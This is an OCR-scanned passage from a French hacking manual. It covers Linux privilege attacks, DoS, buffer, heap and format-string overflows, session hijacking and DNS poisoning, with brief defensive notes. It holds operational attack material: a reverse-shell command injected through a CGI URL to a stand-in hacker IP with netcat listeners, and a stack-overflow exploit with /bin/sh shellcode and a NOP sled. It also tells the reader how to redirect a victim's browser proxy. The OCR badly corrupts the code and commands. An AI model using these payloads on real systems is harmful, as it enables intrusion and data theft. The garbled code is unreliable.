Pour informations, il existe certains sites dedies a ces petits programmes. 



le code source : 

Une des grandes forces de Linux est la possibilite d'avoir acces a son code source. 
Pourquoi ne pas en profiter pour y decouvrir des failles ? 

Cela peut-etre un travail de longue haleine mais necessite que trois elements : le code 
source, un scanner de failles parcourant les codes sources (cf le chapitre sur le 
piratage de logiciels) et vos connaissances. 

les fichiers so et les autres bibliotheques : 

Les bibliotheques sont des bouts de codes definissant les fonctions qu'utilisent 
certains programmes. 

Les bibliotheques se doivent d'etre securisees, mais le sont-elles vraiment ? 

Nous allons sommairement voir comment sont creees les bibliotheques. 

Les bibliotheques definissent des fonctions qui seront utilisees par les programmes. 

II existe deux types de bibliotheques : les bibliotheques dynamiques et les 
bibliotheques statiques. 

Nous allons seulement voir la creation des bibliotheques ELF : 
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- les bibliotheques statiques (qui sont integrees a l'executable lors de l'edition 

des liens) : 

Deja, il faut ecrire en langage C les fonctions de la bibliotheque, renommer les 
fichiers sources en nom_choisi.c . Apres cela, il faut en faire un fichier objet. Puis 
utiliser la commande ar avec ces options pour transformer le fichier objet en fichier 
bibliotheque (ayant comme extension « .a ») . Pour finir on peut utiliser la commande 
ranlib pour creer l'index de la nouvelle bibliotheque. 

- les bibliotheques dynamiques (qui sont chargees en memoire lors de leurs 
appels) : 

Comme pour les bibliotheques statiques, il faut creer un fichier objet puis avec gcc, il 
va falloir creer la bibliotheque (et en comme extension « .so ») avec des options 
comme -shared. 

Pour plus informations sur la creation des bibliotheques statiques et dynamiques sous 
Linux, referez-vous au fichier d'aide des commandes specifiees mais aussi a des livres 
traitant de la programmation sous Linux. 



Quelques fonctions servant a charger des bibliotheques : 

•dlopen( ); permet de charger des bibliotheques dynamique. 
•dlsym( ); permet d'avoir l'adresse de depart dune fonction. 
•dlclose( ); permet de decharger des bibliotheques dynamiques. 



les modules chargeables : 

L' explication de la creation d'un module sous linux depasse un peu le cadre de ce 
livre bien que cela puisse etre une tres bonne protection et une tres bonne base 
d'attaque. De plus seuls des bouquins traitant de la programmation sous linux peuvent 
expliquer de fond en comble la creation de modules kernel invisibles ou non. 

attaque par lien symbolique : 

Cette attaque peut permettre aux pirates d'acceder a des fichiers sensibles et d'effacer 
leurs contenus. 

Mais qu'est-ce qu'un lien symbolique ? 

Un lien symbolique est un simple fichier (sous Unix tout est fichier) qui creer un 
raccourci/lien vers un autre fichier. Lorsqu'un programme ou un utilisateur cree un 
lien ( a l'aide de la commande In -s <f ichier_precede_du_chemin> 
<nom_raccourci> ), ce dernier herite des autorisations d'acces que l'utilisateur a le 
droit d'affecter a un fichier. Le probleme ici, est que ce fichier « pointe » vers un autre 
fichier, done lorsqu'un element (utilitaire, programme, utilisateur) modifiera de 
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quelques manieres que ce soient le lien, le fichier « pointe » heritera des autorisations 
du lien. 

C'est pour cela, que cette attaque est tres utilisee pour obtenir ou effacer le contenu 
des fichiers sensibles (/etc/passwd, le fichier shadow, lilo.conf et autres fichiers de 
configurations...). 

Les systemes sous Unix ont generalement le repertoire /temp qui n'est rempli que de 
fichiers temporaires qu'utilisent certains programmes. En determinant a l'avance le 
nom du fichier temporaire que creera un programme, en lui donnant la propriete de 
lien symbolique : des que le programme sera execute, le fichier sensible appartiendra 
a l'utilisateur ayant executer le programme. 

troyens, programme infectant et sniffers : 

Comme pour les systemes sous Windows, Unix/Linux peut-etre infecte par des 
programmes infectant (cf chapitre sur les virus) et des logiciels d'administration a 
distance utilises dans un but de malveillance ou comme backdoor. 

Un sniffer, comme nous le verrons au chapitre sur les sniffers, permet de capturer le 
trafic dun systeme. Linux possede plusieurs sniffers: comme TCPdump. 

telnet inverse : 

Le telnet inverse permet d'avoir l'interpreteur de commandes de sa cible avec une 
connexion initialisee par elle-meme, en faite on va creer une connexion « inversee » 
(c'est-a-dire que le serveur cible va se connecter a notre systeme et nous laisser 
pouvoir executer des commandes sur son shell). 

Pour cela, on va creer 2 canaux de communications a l'aide des espions de netcat 
pour qu'ils ecoutent deux ports de notre systeme. Maintenant la cible va pouvoir se 
connecter aux espions. 

On peut maintenant ecrire des commandes sur l'un des espions, le shell de la cible va 
l'interpreter et nous renvoyer le(s) resultat(s) sur l'autre canal de communication. 

Maintenant passons a la configuration. 

Sur notre machine, on doit avoir deux fenetres de netcat : 

- a la premiere, on a passe la commande : nc -1 -v -n -p 714 

- a la deuxieme, on a passe la commande : nc -1 -v -n -p 417 

La premiere fenetre va servir a passer les commandes au shell de la cible, la deuxieme 
a recevoir les resultats de la cible. 

Maintenant, vous allez taper la commande suivante dans votre navigateur prefere : 
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telnet ip du hacker 714 | /bin/sh | telnet ip du hacker 417 
sous la forme Unicode pour que votre navigateur l'execute : 

http: //www. site . com/ cgi- 

bin/page. cgi ?var=/usr/bin/telnet%20ip_du_hacker%20714%20 | %20/ 
bin/sh%20 | %20/usr/bin/telnet%20ip_du_hacker%20417 

La principale maniere de faire du telnet inverse serait de trouver un serveur executant 
un cgi et acceptant que Ton passe des arguments dans l'url. 



obtenir les mots de passe du systeme : 

Pour cela, le pirate a besoin dun logiciel de crackage de mots de passe et des fichiers 
ou sont conserves les logins (/etc/passwd) et les mots de passe (/etc/shadow) . 



Pour plus informations, referez-vous au chapitre sur le cracking de mots de passe. 
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D'autres techniques de 

piratage 
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Attaques DoS et DdoS 



Les attaques DoS et DDoS servent a invalider un / des systemes a distance ou 
localement. 

Les attaques DoS sont generalement utilisees lorsque Ton ne peut pas penetrer un 
systeme et que Ton prefere le faire couler ou 1' invalider. On peut aussi utiliser des 
attaques DoS et DDoS lorsque Ton ne veut pas qu'un systeme assure sa fonction. 

II existe differentes techniques d'attaques Dos et DDoS que nous verrons plus tard. 
Voyons d'abord comment fonctionnent ces attaques pour arriver a leur fin. 

II existe deux types d'attaques Dos : 
- le DoS local 
Le DoS reseau 



Le DoS local peut passer par : 

une saturation disque 

saturation de l'espace memoire par la creation d'un processus 
demandant enormement de travail de la part du processeur et beaucoup 
de memoire 

un buffer overflow sur une fonction d'un programme 

la saturation des partitions des fichiers logs pour ne pas permettre au 

systeme d'enregistrer les activites du pirate. 

une attaque du systeme de fichiers ou du noyau 

Le DoS reseau peut passer par : 

- une saturation des services du systeme 
un buffer overflow a distance 

l'utilisation des technologies du Web comme le Javascript, Active X 
pour planter ou degrader le systeme 
l'epuisement de la bande passante d'un reseau 

l'epuisement des ressources systemes (par exemple en fragmentant IP a 
plusieurs reprises et massivement) 

et par plusieurs d'autres techniques (comme le smurf, le teardrop. . .) 

Les codes pour faire des attaques de type refus de services peuvent etre ecrits dans 
differents languages : du C au PERL en passant par le python et le REBOL. 
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logiciels de DoS ou de simulation d'attaque : 



Les logiciels permettant de faire du refus de service distribue ont generalement le 
meme fonctionnement et la meme architecture : un client (generalement la personne 
voulant faire l'attaque), les serveurs (logiciels qui vont servir de relais entre le client 
et les agents) et les agents (ce sont ces bouts de codes qui vont faire planter les 
systemes a distance). 

Comme logiciel de refus de service distribue, il y a : 

• TRINOO 

• TRIBAL FLOOD NETWORK 

• TFN2K 



Parades : 

appliquer les patchs de securite prevues a cet effet 
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Depassements de tampon 



Analysons d'abord l'histoire des depassements de tampons. Puis nous verrons les 
bases a connaitre pour mieux saisir la puissance de cette vulnerabilite. Nous verrons 
en dernier comment les pirates font pour mettre en place une attaque par depassement 
de tampon. 



mais qu'est-ce qu'un depassement de tampon ? 

Une attaque de type buffer overflow (depassement de tampon) sert a faire deborder la 
pile d' execution. Cela entraine le deplacement et la destruction d' elements utilises par 
un processus, done lorsque des programmes viendront chercher des elements les 
concernant a des espaces memoire bien precis, ils trouveront autre chose. 

Generalement, lorsqu'il y a depassement de tampon, il y a exploitation des 
fonctionnalites et des possibilites du systeme cible. II y a plusieurs applications qu'un 
pirate peut vouloir exploiter : le shell (ou interpreteur de commandes) du systeme, des 
logiciels specifiques... 

Bien sur, un buffer overflow peut seulement servir a faire une attaque de type denial 
of service local. 

La possibility de faire des buffer overflow est due a deux problemes : 
le manque de controle des fonctions passees en memoire 
le manque de controle des elements situes dans la pile 

Le premier probleme est relativement facile a eviter si les programmeurs utilisaient 
quelques notions de programmation securisee. 

Le deuxieme probleme est un peu plus dur a eviter car pour securiser cela, il faudrait, 
par exemple, creer un patch pour la pile ou encore verrouiller et deverrouiller 
dynamiquement les espaces memoire du systeme. 



les notions de base : 

Pour bien comprendre les attaques de type depassement de tampon, il faut des 
connaissances en langage C et assembleur, surtout des connaissances sur les registres, 
les registres de segments, sur le comment de la creation des adresses memoires, les 
types de donnees, les instructions CALL, IRET, RET, RETF, NOP mais aussi sur le 
fonctionnement d'un empilement et d'un depilement, et le plus important savoir 
comment fonctionne la pile. 
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le language C 



Nous allons seulement voir les trois principales fonctions qu'utilisent generalement 
les pirates pour effectuer un depassement de tampon . 

Ilya: 

les variantes de printf( ) qui permettent d'imprimer des caracteres vers un 
tampon que le programme specifie (cf sprintf( );) 
strcpy(dest, src); qui permet de copier 'src' dans 'dest' 
strcat(dest, src); qui permet de concatener des elements, lorsque les 
arguments passes a la fonction correspondent a des variables, ce sont 
leurs valeurs qui sont concatenees. 



les registres du processeur : 



Nom du registre 


Nom du registre 


Nom des registres 


Fonction 


pour les systemes 
32 bits 


pour les systemes 
16 bits 


pour les systemes 8 
bits : (bit de poids 
fort et bit de poids 
faible) 




EAX 


AX 


AH et AL 


Registre 
accumulateur 


EBX 


BX 


BH et BL 


Registre de base 


ECX 


CX 


CH et CL 


Registre compteur 


EDX 


DX 


DH et DL 


Registre de donnees 


ESI 


SI 




Index de sources 


EDI 


DI 




Index de destination 


ESP 


SP 




Pointeur de pile 


EIP 


IP 




Pointeur 
d' instruction 


EBP 


BP 




Pointeur de base 



les registres de segment : 



Nom du registre 


Signification 


Fonction 


CS 


Segment de Code 


11 a comme valeur l'adresse 
du commencement des 
instructions d'un 
programme 


DS 


Segment de Donnees 


11 a comme valeur l'adresse 
du debut des donnees 
qu'utilise le programme 


ES 


Extra-Segment 


11 a comme adresse un 
segment de donnees libre 


SS 


Segment de Pile 


11 a comme adresse celle de 
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la pile 


FS et GS 




11 sont comme ES 



la creation des adresses memoire : 

En premier, vous devez savoir qu'une adresse memoire est formee du segment et de 
l'offset. 

Pour connaitre la place d'un octet, il faut prendre le segment et l'offset, leur ajouter la 
lettre h (au deux parties) puis multiplier le segment par seize et additionner au resultat 
l'offset. 

Le resultat de cette multiplication puis de cette addition constitue l'adresse memoire 
d'un octet. 

Pour plus informations, referez-vous a un livre traitant de la constitution des elements 
d'un ordinateur. 



certaines instructions : 



Nom de 1' instruction 


Fonction 


CALL 


L' instruction CALL permet de se 
brancher a une sous-routine a l'aide de 
branchements intra-segments ou extra- 
segments. Lors de l'utilisation de cette 
instruction, le registre IP est mis sur la 
pile, on lui affecte l'adresse de la sous- 
routine et lorsque la sous-routine a fini 
d'etre executee, la precedente valeur de IP 
est chargee 


RET 


Permet de revenir au programme parent ( 
ou encore appelant ) lorsqu'une sous- 
routine s'est executee 


RETF 


Son but est semblable a celui de RET. Sa 
particularite est qu'elle permet de revenir 
au programme appelant meme s'il se 
trouve dans un autre segment 


NOP 


C'est une instruction qui ne fait rien et 
passe a 1' instruction suivante. 



POP et PUSH : 

Pour mettre une donnee sur la pile, on utilise l'instruction PUSH et cela s'appelle faire 
un empilement, a ce moment-la, SP est decremente de deux octets pour les mots, 4 
octets pour les double mots. . . 
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Pour recuperer une donnee placee sur la pile, on utilise l'instruction POP, cela 
s'appelle faire un depilement, a ce moment-la, SP est incremente de 2 octets pour les 
mots, 4 octets pour le double mots. . . 

la pile : 

La pile est un espace utilise par les programmes pour placer temporairement les 
elements et pouvoirs les recuperer plus tard. La pile est de type LIFO (Last In First 
Out = le premier element entre est le dernier sorti) c'est-a-dire, pour ceux qui 
n'auraient pas compris que la pile se rempli de la fin vers le debut (un peu comme un 
verre que Ton remplit d'eau). 

creer un code d'attaque : 

Nous allons voir comment mettre en place une attaque de type depassement tampon 
servant a exploiter une des fonctionnalite du systeme. Cela s'appelle faire un 
depassement de tampon controle. 

Mais voyons d'abord quelques moyens permettant d'injecter et executer son code actif 
(appelle aussi oeuf) . 

l'injection et l'execution : 

Le but de tout ce que Ton va faire, va etre de faire executer un shellcode par le 
programme cible : plus le logiciel aura des droits eleves plus notre shellcode aura des 
possibilites d'acces eleves. 

Le buffer que l'on va injecter peut aussi contenir un lien vers une adresse ou Ton aura 
place le shellcode (ou oeuf). 

Avant de continuer, voyons ou Ton peut placer l'osuf. Ce dernier peut-etre place dans 
un fichier, dans des variables d'environnement, directement sur la pile, dans une 
bibliotheque dynamique des fonctions... 

Pour se brancher directement sur l'oeuf , nous allons voir 3 methodes : le 
branchement direct, l'utilisation de la fonction CALL, le retour a une adresse 
approximative. 

la branchements direct : cela peut servir si Ton connait l'adresse ou est 
situee l'ceuf sur la pile 

La fonction CALL : cette fonction du langage assembleur permet 
d'appeler des sous-routines. Avec certaines options, CALL peut faire des 
branchements intra-segment et extra-segment. Lors de cet appel, EIP est 
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placee sur la pile et contient l'adresse de la sous-routine appelee. Quand la 
sous-routine a fini son execution, l'ancienne valeur de IP est rechargee. 
Le retour a une adresse approximative : generalement lorsqu'une sous- 
routine finit son execution, on revient au programme appelant a l'aide de 
la fonction RET. Si un pirate connait l'adresse retour, il peut soit la 
modifier par l'adresse de son oeuvre soit utiliser un buffer overflow pour 
placer son oeuf a l'adresse de retour. 

creer son oeuf : 

L'oeuf correspond a la charge centrale de l'attaque. Un oeuf attaque generalement une 
faille qui permet de faire planter le systeme cible ou pouvoir acceder a des fichiers. . . 

L'ceuf doit done etre bien code. 

Pour creer un oeuf, le conseil serait d'ecrire le moins de code possible, d'utiliser le 
plus possible les ressources offertes par le systeme cible (comme les bibliotheques 
dynamiques que possede le systeme, les appels systemes ou syscall), de passer par le 
shell pour simplifier la recherche et faeces a un fichier et de laisser un backdoor. 



Le shellcode peut etre ecrit en language C. La plupart de ses instructions devront etre 
des appels systemes (syscall). 

Exemple : exit(O) doit etre remplace par _exit(0) 

Quand le shellcode sera pret, on va le compiler et le desassembler (car un shellcode 
doit etre en language assembleur). II faut surtout conserver les parties du shellcode 
qui utilisent des interruptions et d'autres fonctions fournis par le systeme (d'ou 
l'utilisation de syscalls qui utilisent ces genres de fonctions systemes). Quand tout est 
enfin pret (je parle bien sur du shellcode code en assembleur), il va falloir transformer 
ou plutot traduire notre oeuvre en hexadecimal et coder dans notre language prefere 
les instructions qui vont nous permettre de lancer notre shellcode. 



Le buffer overflow peut aussi permettre de creer deux canaux de communication 
entre le systeme pirate et le systeme cible : un peu comme faire un telnet inverse. 

Si Ton veut placer notre oeuf sur la pile et faire un branchement direct ou un 
branchement par retour a une adresse approximative, l'oeuf peut contenir au debut une 
suite plus ou moins longue d'instructions NOP car les caracteristiques de cette 
instruction est de ne rien faire et de passer a l'instruction suivante. Pour finir, le code 
devra etre encoder car certains programmeurs filtrent les elements d'un tampon. 

Vous etes maintenant capables de creer votre propre attaque par depassement de 
tampons. 
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Vous pouvez aussi maintenant creer un oeuf qui vous donnera un acces au systeme ou 
qui le fera tout simplement planter. 

La creation d'un ceuf peut aussi vous permettre d'exploiter plusieurs failles en meme 
temps. 



Quelques informations : 

Pour reussir une attaque de type buffer overflow, le pirate doit arriver a overwriter 
ebp et eip qui sont generalement places apres le buffer mit sur la pile (stack). 

Lors de l'appel d'une fonction, generalement le processeur doit sauvegarder 
l'environnement pour qu'on puisse le retrouver apres l'execution de la fonction. Le 
processeur place l'argument de la fonction, puis il appelle la fonction. II PUSH eip 
puis sauvegarde ebp a l'aide d'un : 

push ebp 

apres tout cela, il place esp (qui contient l'adresse du dernier element de la pile) dans 
ebp. Ensuite, il decremente esp pour qu'il puisse contenir les nouvelles variables (et 
oui c'est une soustraction qui est fait car la pile croit vers le bas sur Little Endian). 
Pour finir, on place esp. 

Ca donne generalement un true du genre : 

<- ga va vers le haut de la pile 

[ buffer ] [ ebp saved ] [ eip saved ] [ variable ] 
ga va vers le bas de la pile -> 

Quand la fonction a fini son execution, il faut retablir l'environnement. 

On fait done sur esp, l'inverse de faction qui avait ete faite sur elle au debut de la 
fonction dans le but de diminuer la taille de la pile, puis on place ebp dans esp. 
Ensuite, on POP 1' element se trouvant au dessus de la pile et on le place dans ebp. 
L' element se trouvant au dessus de la pile est en faite l'ancienne valeur de ebp : [ ebp 
saved ]. Pour terminer, on POP le dernier element de la pile et on le place dans eip 

Avant de terminer ce chapitre, nous allons certaines variantes des failles de type stack 
overflow et autres. 



Buffer Overflow 

En premier, il y a le buffer overflow qui sert a ecraser des donnees sur la pile. Voici 
un code exemple : 
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int main (int argc, char *argv[]) { 
char buffer [100] ; 
strcpy (buf f er , argv[l]); 
return ; 

} 

Ceci est un exemple tres simple et on voit facilement le probleme: ce mini 
programme accepte un argument qui est ensuite copie dans le buffer, un tableau qui 
n'accepte que 100 caracteres. Si on lui passait une chaine de 100 caracteres il n'y a 
pas de problemes comme le montre 1 'exemple : 

$> gdb -g vulnerable 

(gdb) run "perl -e "print ( ' A ' xl 00 ) " " 

Starting program: 
/ root /Khaale 1 /Over f lows/ exemples/f aillel 3 /vulnerable "perl 
-e "printf ( 'A'xlOO) " " 

Program exited normally, 
(gdb) 

Par contre, si l'on passe une chaine de plus de 100 caracteres (meme de 2 mots de 
plus soit 108 caracteres), on voit s'afficher un beau : 

Program received signal SIGSEGV, Segmentation Fault. 

Maintenant voyons comment il serait possible d'exploiter cette faille. II nous faudrait 
d'abord disassembler le mini programme et mettre un point d' arret sur la fonction 
strcpy() pour ensuite connaitre l'adresse de buffer : il contiendra le code d'attaque. 

Astuce : aidez-vous de l'operateur & pour afficher grace a gdb l'adresse de buffer : 

print Sbuffer. 

Sachant que buffer accepte 100 caracteres et que ebp et eip valent en tout 8 octets (4 
chacun car ce sont des mots). On va dire qu'avec 108 caracteres on aura 
completement overwrite [ ebp saved ]. 



Voici un code d'attaque qui pourrait permettre d'attaquer ce code : 



#include <stdlib 


.h> 


#include <stdio. 


h> 


#define BUF PROG 


100 


#define LE PLUS 


8 


int main ( ) 




{ 

char shellcode[] 




"\xeb\xlf \x5e\x8 


9\x7 6\x08\x31\xc0\x88\x4 6\x07" 




"\x8 9\x4 6\x0c\x8 9\xf3\x8d\x4e\x0 8\x8d\x5 6" 




"\x0c\xb0\x0b\xcd\x8 0\x31\xdb\x8 9\xd8\x4 0" 




"\xcd\x8 0\xe8\xdc\xf f\xf f\xf f " 




"/bin/sh"; 


char addr [ ] = " [ 


ici adresse du buffer]"; 


char buffer [110] 


r 



72 



int a; 
int i; 



for (a =0; a < ( (BUF_PROG+LE_PLUS ) - 
(strlen (addr) +strlen (shellcode) ) ) ; a++) 
buffer [a] = ' \x90'; 

for (i = 0; shellcode [ i ] ; i++, a++) 
buffer [a] = shellcode [ i ] ; 

for (i = 0; addr[i]; i++, a++) 
buffer [a] = addr[i]; 

execl ( " /root /Khaalel /Over flows /exemples/fai llel 3 /vulnerable" , 

"vulnerable", buffer, NULL); 

} 



Normalement vous devriez avoir compris un peu plus la notion de buffer overflow. 



Off-by-One Overflow: 

On est toujours dans les vulnerabilites de type buffer overflow. L'off-by-one (ou 
encore frame pointer overwriting) est une technique qui est speciale car generalement 
elle n'est pas provoquee par l'utilisation d'une fonction faisant defaut. En effet, le 
responsable est le programmeur qui ne fait pas toujours attention au code de son 
programme. 

Voici par exemple le bout de code d'un programme : 

char buf f er [ 1 50 ] ; 

for (i = 0; i <= 150 && chaine[i]; i++) 
buffer [i] = chaine [i]; 

A premiere vue, elle n'a pas de vulnerabilites. Et bien si, elle en a une, qui est de type 
off-by-one. Ou ? et bien vous allez tout de suite le savoir. 

Le programme declare un tableau de caracteres qui peut contenir 150 caracteres. 

Pour information, vous devez savoir que le tableau de caracteres chaine est fournit en 
argument au programme par l'utilisateur et que le programme n'a pas fait de 
verification sur la chaine. 

Ensuite le programme met la chaine de l'utilisateur dans le tableau buffer en utilisant 
une boucle for. 
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En testant le programme et en fournissant une chaine de 150 caracteres, le 
programme se finit bien : 

$> gdb -q vulnerable 

(gdb) run 'perl -e "print('A*xl00)" , 

Starting program: /root/Khaalel/Overflows/exemples/failleM/vulnerable'perl -e 
"printf(•A'xl00)" , 
Program exited normally, 
(gdb) 

mais en fournissant une chaines de 151 caracteres, on retrouve l'habituel : 

Program received signal SIGSEGV, Segmentation Fault. 
Pourquoi? 

II copie integralement les 151 caracteres car la boucle commence a 0 pour boucler 
151 fois jusqu'a 150 (et oui de 0 a 150, il y a 151 pas car on commence a compter a 
partir de 0), mais le probleme est le tableau qui n'accepte que 150 caracteres 
entrainant l'ecrasement et 1' overwriting du dernier octet de [ ebp saved ]. 

Le probleme reside en faite dans l'utilisation de l'operateur : « <= » dans la boucle 
for qu'il faudrait eventuellement remplacer par un simple « < ». 

C'est vrai qu'on ne peut ecrire de shellcode sur un octet, mais cela ne veut pas dire 
que cette vulnerabilite ne sert a rien car si la pile est encore executable, on peut 
toujours ecrire sur cet octet l'adresse ou se trouve le shellcode. Si vous ne connaissez 
pas l'adresse exacte du shellcode, vous pouvez toujours faire une technique de brute 
forcing, qui va tester chaque adresse en memo ire jusqu'a trouver celle qui contient le 
shellcode. 



Heap Overflow : 

Le heap overflow est une technique de overflow qui differe de l'habituel stack 
overflow car tout ce passe dans le heap (ou encore tas). 

Qu'est-ce-que le tas ? 

Et bien, comme la pile, c'est une section en memoire qui contient des elements. 

La pile contient les elements qui vont etre executes par le processeur et qui sont 
places dans un ordre bien defini. Le tas contient les variables allouees 
dynamiquement et qui sont placees dans un ordre aleatoire car il n'y a pas de regies. 

Cette vulnerabilite est basee sur l'utilisation des fonctions malloc( ), free( ) et unlink( 
)• 
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La fonction malloc() alloue de la memoire. Elle fonctionne en fragmentant le tas par 
blocs qui contient soit une structure (appelee aussi chunk) dormant des informations 
sur la zone memoire allouee soit la zone memoire allouee. 

La fonction free() libere un espace memoire. Ce qui fait que free( ) est important dans 
le fonctionnement du heap overflow est que quand free( ) libere de la memoire et voit 
que le bloc suivant est aussi libere, il fait un gros bloc libre sous un seul chunk (grace 
a la fonction unlink( )). 



Voici le code de la fonction unlink () 

#define unlink (P, BK, FD) 
{ 

BK = P->bk; 
FD = P->fd; 
FD->bk = BK; 
BK->fd = FD; 

} 



Pour reussir cette attaque, il va falloir ecrire plus de donnees que peut en recevoir le 
premier bloc de la zone memoire allouee pour pouvoir ecrire dans le chunk de la 
deuxieme zone de memoire. 

Que ecrire et ou ? 

Et bien, un chunk est constitue de plusieurs champs : 4 en faite. 



prev_size 
size 

m 

bk 



Sans entrer dans les details, la plupart du temps, il faudra mettre dans le champs 
prev size, que le chunk est libre (en relisant ce pourquoi free() est important, vous 
comprendrez), dans le champs fd, il faudra ecrire l'adresse ou Ton veut mettre notre 
shellcode et dans le champ bk, l'adresse ou se trouve le shellcode. 

Pour plus d' informations sur le heap overflow, je vous conseille de lire l'article 
« Once upon a freeQ » du phrack 57. 



Parades : 

- controler tous les elements passes sur la pile 

- pour detecter si une application est vulnerable, analyser son code source ( 
a l'aide de scanner de vulnerability) ou encore tester manuellement le 
fonctionnement de l'application en y faisant un petit audit. 
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Securiser la pile d'execution ou la rendre non executable. 
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Le detournement de sessions 



Le detournement de session (ou encore hijacking) est une technique de piratage qui 
consiste a s'emparer de la connexion d'une autre personne. 

Cela peut pas etre assimile a de TIP spoofing car Ton se fait passer pour une personne 
que Ton n'est pas. 

Nous allons voir deux types de detournement de sessions : 

celui qui consiste a envoyer des paquets avant le client, 

celui qui consiste a se faire passer pour ce que Ton n'est pas dans le but de 

faire de l'espionnage ou de rediger le client ou nous le voulons. 

Ne vous attendez pas a un manuel de cuisine qui vous explique quoi faire, a quel 
moment, et quels doivent etre les resultats car comme TIP spoofing, il n'y a pas de 
protocole type a appliquer et les resultats dependent de l'environnement dans lequelle 
on se trouve, aussi de notre but. 



Premier type de detournement de session : 

Cette technique depend de notre rapidite a analyser des paquets et a notre rapidite a 
reinjecter des paquets dans le reseau. 

II va nous falloir un sniffer, un logiciel qui forge des paquets et etre sur le meme 
segment reseau que le systeme cible (le controler serait le mieux) . 

Imaginons trois systemes A, B et C. 

Le systeme A est le systeme securise auquel on essaie d'acceder, le systeme B est le 
client autorise a acceder au systeme A et le systeme C est le systeme du pirate qui 
essaie de detourner la connexion de B. 

C va devoir analyser le trafic reseau de B pour savoir quand B se connecte a A et 
envoyer le 3eme paquet necessaire pour etablir une connexion avec A (cf la poignee 
de mains). 

Pour pouvoir analyser le trafic reseau de B, C va devoir : 

soit se faire passer pour la passerelle par defaut (cf l'arp spoofing) 
soit flooder le switch pour qu'il se comporte comme un hub et lui mettre 
un sniffer sur son port SPAN 

soient infiltrer B et lui installer un sniffer et un backdoor. 

L'attaque va se derouler ainsi : C va sniffer la connexion de B. Lorsqu'il verra un 
paquet contenant les flags SYN et ACK actives et provenant du systeme A, il va 
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envoyer a A un paquet ACK ayant comme IP source celle de B, puis il devra trouver 
le moyen de communiquer tranquillement avec A en se faisant passer pour B sans que 
ce dernier ne donne signe de vie. Pour cela, il peut faire planter B et associer son 
adresse MAC a TIP de B en faisant du DNS spoofing. 

Le systeme C peut aussi infiltrer le systeme B et y mettre un programme qui sniffera 
le trafic reseau de B et qui aura comme 2eme mission de faire suivre, vers le systeme 
C, les paquets provenant de A pour que C puisse repondre a la place de B. II ne faudra 
pas oublier d'aj outer, au programme, une fonction qui bloquera tout paquets emis de 
B en direction de A. 



Deuxieme type de detournement de session : 

Cette technique consiste a utiliser des programmes ou des systemes qui relaient des 
paquets et en lesquels les gens ont confiance. 

Ces systemes et logiciels peuvent etre des serveurs socks, des proxys, des routeurs... 

• exemple de routeurs : 

Dox Route 

• exemple de proxys : 

Achilles qui est un serveur proxy qui permet de capturer, modifier (si on le veut) 
et faire suivre les requetes d'un client. Pour que cela fonctionne, il faut installer le 
programme sur notre systeme puis il va falloir configurer les parametres Internet de la 
victime. 

II y a deux parametres a modifier : il faut modifier le serveur Proxy qu'utilise la 
victime. 

Sous Internet Explorer, aller dans Outils/Options Internet/Connexions et dans les 
parametres de la connexion de la victime il faut mettre notre adresse IP dans le champ 
Adresse : du serveur proxy et mettre dans le champ Port : le port qu'ecoute Achilles 
sur notre systeme. 
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Options Internet 
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V Detecter automatiquement les parametres de Internet Explorer 

V Utiliser le script de configuration automatique 

Adresse f 
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Serveur proxy — 
W Utiliser un serveur proxy 
Adresse : 1 xx,xx,xx.xx 



P Ne pas utiliser de serveur proxy pour les adresses locales 



Options de numerotation 
Norn W 



Hot de passe : 
Domaine : 



V Ne pas autoriser les programmes Internet a utiliser cette connexion 
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£ Internet 



II y a quelques temps, les serveurs DNS (dont certaines versions de BIND) pouvaient 
etre detournes avec differentes methodes. 

En voici une : 

II fallait empoisonner le cache du serveur DNS cible avec de fausses informations. 
Pour realiser cela, le pirate demande a la cible de faire une requete DNS de type A 
(resolution de nom) vers le systeme DNS du pirate. Ce dernier va renvoyer une 
reponse faussee (cela peut par exemple servir a detourner le trafic d'un site web). 

La cible etait bien sur le DNS vulnerable. 
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Formats Strings 



mais d'ou vient-elle ? 

La vulnerabilite des chaines de format existe parce que les developpeurs de logiciels 
ne controlent pas la validite des arguments externes utilises dans les fonctions de la 
famille printf( ). 

Avant d'aller plus loin, il faut quand meme savoir ce qu'est une chaine de format. 

Une chaine de format est une chaine de caracteres creee lors de l'execution d'un 
programme a l'aide de specificateurs de formats etant associes a une variable. 

Cette vulnerabilite va nous permettre de lire et ecrire dans la pile d'execution. 

but de cette vulnerabilite : 

La vulnerabilite des chaines de formats peut aider un pirate a lire des elements en 
memoire, ecrire des shellcodes ou des pointeurs en memoire, faire une attaque de type 
depassement de tampon ou encore refus de service, ecraser et remplacer des elements 
en memoire. 



lire en memoire : 

Lire en memoire peut servir a obtenir le mot de passe d'une application lorsque le 
programme le conserve. . . 

Pour lire en memoire, il faut utiliser le specificateur %x , qui lit des elements de 
quatre octets ou le specificateur %s qui lit des elements a des emplacements 
memoires arbitraires. 



ecrire en memoire : 

Cette technique va nous permettre d' ecrire en memoire des shellcodes, des pointeurs 
vers un shellcode, remplacer des entrees, des adresses de retour d'une fonction, 
ecraser les valeurs. . . 

Pour ecrire en memoire, il faut utiliser le specificateur %n . 
faire deborder la pile et planter le systeme : 
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Pour faire deborder la pile ou faire planter un systeme a l'aide des chaines de format, 
il nous faut utiliser les elements demultipliant les possibilites de lecture et d'ecriture 
des specificateurs de format. II y a par exemple le jeton etoile « * » qui permet 
d'augmenter les possibilites du specificateur de format de quatre octets. 

Ex : %***2x 

Ou il suffit de rajouter un nombre d'entre % et la lettre du specificateur pour lui 
specifier d'utiliser x caracteres (elements) pour lire et ecrire ce que l'on veut. 

Voici une liste non exhaustive de certains specificateurs de formats : 

-%s : qui permet de lire des elements a des emplacements arbitraires. 
-%x : qui permet de lire des elements de quatre octets. II peut aussi nous 

permettre d'atteindre une adresse ou une fonction. 
-%n : qui permet d'ecrire en memoire. 
-%i : qui permet de lire des entiers. 
-%p : qui permet de traverser la pile. 



Parades : 

- controlez la validite et le type des elements externes, 
faites un audit du code des applications, 

creez ou appliquez des patchs pour la securisation de la pile. Des patchs 
donnant certaines restrictions aux fonctions en memoire et protegeant la 
pile. 
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Failles specifiques aux Web 



Dans ce chapitre, nous allons voir certaines failles que peuvent avoir les sites Web 
que vous visitez ou construisez. Ce chapitre a principalement ete ecrit pour les 
webmasters ne voulant pas que leur site tombe lors d'attaques de pirates mais aussi 
pour ceux faisant des audits de sites et aux personnes voulant comprendre comment 
les pirates arrivent a defacer des sites. 

SQL injection : 

Cette faille qui consiste a contourner une authentification de session n'est possible 
que sur les serveurs qui ne filtrent pas les caracteres dit speciaux comme les 
guillements « " », l'apostrophe « ' », le slach «/», l'anti-slach « \ » et les caracteres 
ASCII... 

